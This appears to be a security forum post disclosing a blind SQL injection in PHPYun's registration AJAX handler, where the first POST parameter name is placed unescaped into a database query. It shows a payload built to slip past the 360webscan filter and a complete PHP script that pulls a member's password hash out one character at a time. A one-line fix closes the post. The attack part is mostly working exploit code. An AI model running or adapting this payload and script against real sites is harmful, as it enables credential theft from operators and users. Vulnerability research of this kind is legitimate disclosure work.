PHPYun SQL injection that bypasses 360webscan, with exploit
Single quotes can be introduced into the injection point, but they are not needed here.
Even though 360webscan is installed, the password hash can still be extracted by injection.
I wrote a script to run it. (The code is slow, but it runs through to the end.) It is too crude to be worth saying much about.
In model/register.class.php:

function ajax_reg_action(){
    $post = array_keys($_POST);
    $key_name = $post[0];
    if($key_name=="username"){
        $username=@iconv("utf-8","gbk",$_POST['username']);
        if($this->config['sy_uc_type']=="uc_center"){
            $this->obj->uc_open();
            $user = uc_get_user($username);
        }else{
            $user = $this->obj->DB_select_once("member","`username`='".$username."'");
        }
        if($this->config['sy_regname']!=""){
            $regname=@explode(",",$this->config['sy_regname']);
            if(in_array($username,$regname)){
                echo 2;die;
            }
        }
    }else{
        $user = $this->obj->DB_select_once("member","`".$key_name."`='".$_POST[$key_name]."'");
    }
    if(is_array($user)){
        echo 1;
    }else{
        echo 0;
    }
}
First, $post = array_keys($_POST); collects the names of the POST parameters, and $key_name = $post[0]; takes the first of those names.
As everyone knows, PHPYun's global filter escapes single quotes, but it is applied to POST values. What is used here is a POST key, so single quotes could be introduced through it unfiltered. As it turns out, single quotes are not even needed here.
Continue.
if($key_name=="username"){
    $username=@iconv("utf-8","gbk",$_POST['username']);
    if($this->config['sy_uc_type']=="uc_center"){
        $this->obj->uc_open();
        $user = uc_get_user($username);
    }else{

If $key_name is anything other than "username", the else branch runs instead:

$this->obj->DB_select_once("member","`".$key_name."`='".$_POST[$key_name]."'");

so the key name is concatenated straight into the query, and it is the key that gets used.
The statement executed is

SELECT * FROM phpyun_member WHERE `xx`='asd'

Both xx and asd are attacker-controlled. asd is useless, though: it is a POST value, so the single quotes around it are protected by the value escaping. So the payload has to be built in the key.
A key cannot contain spaces (PHP rewrites spaces in parameter names to underscores), so a + is used where a space would otherwise be needed between or and if.
The key is therefore built like this (everything before the first = is the key, asd is the value):

username`or%2Bif(ascii(substr(password,$yu,1))=$i,1,0)#=asd
360webscan is installed on the target, but this statement gets past it.
There is one more constraint: the key cannot contain an = sign, because the first = in the form field ends the key and everything after it becomes the value. So replace = with <>:

username`or%2Bif(ascii(substr(password,$yu,1))<>$i,1,0)#=asd

Now, when $i equals the ASCII value of the character at position $yu of the password hash, the if() yields 0, no row is returned and the page outputs 0. For every other $i it outputs 1.
Here is a small script.
P.S. I have never properly learned any language; all of this is written blind. The 74cms script I wrote just before this is similar, it only needs a few changes.
<?php
$host = $argv[1];
$yu = 1;            // position in the password hash currently being tested
$result = '';       // characters recovered so far
for ($i = 0; $i < 120; $i++) {
    $lenth = strlen($result);
    if ($lenth == 32) {   // a full 32-character MD5 hex hash has been recovered
        echo "\r\n";
        echo "OK The password is: $result";
        exit;
    }
    // the injection lives in the POST key; the value (asd) is irrelevant
    $content = "username`or%2Bif(ascii(substr(password,$yu,1))<>$i,1,0)#=asd";
    $url = $host . '/index.php?m=register&c=ajax_reg';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $content);
    $response = curl_exec($ch);
    if (curl_errno($ch)) {
        print curl_error($ch);
    }
    curl_close($ch);
    // the page answers 0 only when the character at position $yu equals chr($i)
    if ($response !== false && strpos($response, '0') !== false) {
        echo chr($i);
        $result .= chr($i);
        $yu++;
        $i = 0;     // restart the scan for the next position
    }
}
?>
When run, the script prints the same password hash that is stored for the user in the database.
The script is crude and slow.
Solution:
Restrict the key: only accept a fixed set of field names instead of using whatever the first POST parameter happens to be called.